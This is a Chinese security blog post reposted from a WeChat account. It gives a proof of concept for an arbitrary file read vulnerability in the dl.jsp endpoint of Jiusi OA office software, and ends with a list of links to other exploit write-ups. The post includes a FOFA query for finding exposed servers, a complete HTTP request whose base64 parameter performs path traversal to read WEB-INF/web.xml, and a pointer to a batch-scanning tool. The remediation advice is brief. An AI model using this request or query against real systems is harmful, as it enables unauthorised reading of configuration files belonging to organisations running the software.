九思OA dl任意文件读取漏洞 PoC

2024年11月22日16:37:36评论30 views字数 845阅读2分49秒阅读模式

简介

九思OA产品由北京九思协同软件有限公司（简称九思软件）研发，专为企事业单位和政府机关提供高端协同办公解决方案，助力客户实现信息化、数字化及智能化转型。该产品融合多种管理理念与OA接口技术，旨在帮助企业打破管理壁垒、整合信息资源，打造高效、规范、实时且低成本的管理体系，支持一体化的技术架构。九思OA以“管理利器，释放组织潜能”为宗旨，为客户提供优质的解决方案、产品和服务，助力构建有序、灵活、高效、开放且具凝聚力的管理和技术支持环境。

漏洞描述

九思OA系统在dl.jsp接口处存在任意文件读取漏洞，攻击者可以利用该漏洞访问系统的关键文件，如配置文件，从而使网站处于极高的安全风险之中，严重影响系统的安全性，增加遭受进一步攻击的可能性。

fofa语法

body="/jsoa/login.jsp"

漏洞复现

POST /jsoa/dl.jsp?JkZpbGVOYW1lPS4uLy4uLy4uL1dFQi1JTkYvd2ViLnhtbCZwYXRoPS9h HTTP/1.1Host: IPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipConnection: close

JkZpbGVOYW1lPS4uLy4uLy4uL1dFQi1JTkYvd2ViLnhtbCZwYXRoPS9hbase64解密：&FileName=../../../WEB-INF/web.xml&path=/a

批量检测（批量检测POC工具请在公众号知识星球获取）：

修复建议

1、对用户传入的参数进行限制。

2、关闭互联网暴露面或接口设置访问权限。

原文始发于微信公众号（白帽攻防）：【漏洞复现】九思OA dl任意文件读取漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

九思OA dl任意文件读取漏洞 PoC

【已复现】Craft CMS generate-transform 反序列化代码执行漏洞（CVE-2025-32432）

【成功复现】CrushFTP身份认证绕过漏洞（CVE-2025-2825)

宏景人力资源管理系统 searchCreatPlanList.do SQL注入漏洞(CNVD-2025-6953) POC

WordPress未授权任意文件读取_CVE-2025-2294 POC

Fortinet FortiSwitch 任意密码重置 CVE-2024-48887

DataEase H2 JDBC远程代码执行漏洞CVE-2025-32966

金盘移动图书馆系统信息泄露漏洞

Netgear信息泄露漏洞

JeeWMS cgAutoListController.do SQL注入漏洞

泛微E-Cology9前台SQL注入漏洞

发表评论

在线咨询

微信